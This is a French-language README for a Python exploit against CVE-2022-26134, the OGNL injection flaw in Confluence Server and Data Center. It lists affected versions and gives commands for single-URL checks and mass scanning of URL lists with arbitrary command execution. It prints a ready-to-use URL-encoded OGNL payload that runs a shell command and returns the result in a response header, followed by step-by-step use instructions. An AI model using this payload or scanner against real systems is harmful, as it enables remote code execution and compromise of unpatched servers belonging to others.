
Exploit basé sur Python pour CVE-2022-26134, une vulnérabilité d'injection OGNL dans Confluence Server et Data Center. Prend en charge la vérification d'une URL unique et le scan par lots avec exécution de commandes arbitraires.
CVE-2022-26134 - Vulnérabilité d'injection OGNL dans Confluence
Installer la bibliothèque Python
pip install -r requirements.txt
Vérification de la vulnérabilité
python3 CVE-2022-26134_check.py -u url -c whoami

Scan en masse
python3 CVE-2022-26134_check.py -f url.txt -c whoami

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
payload :
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/
Accédez au service Confluence, interceptez le paquet dont le code de retour est 302, envoyez le paquet contenant le payload ; dans le paquet de réponse, le paramètre X-Qualys-Response renverra le nom d'utilisateur actuel du serveur.

L'URI fourni par l'attaquant est converti en namespace, puis ce namespace est converti en expression OGNL pour être évalué (l'URL fournie par l'attaquant est indirectement transformée en expression OGNL en vue de son évaluation).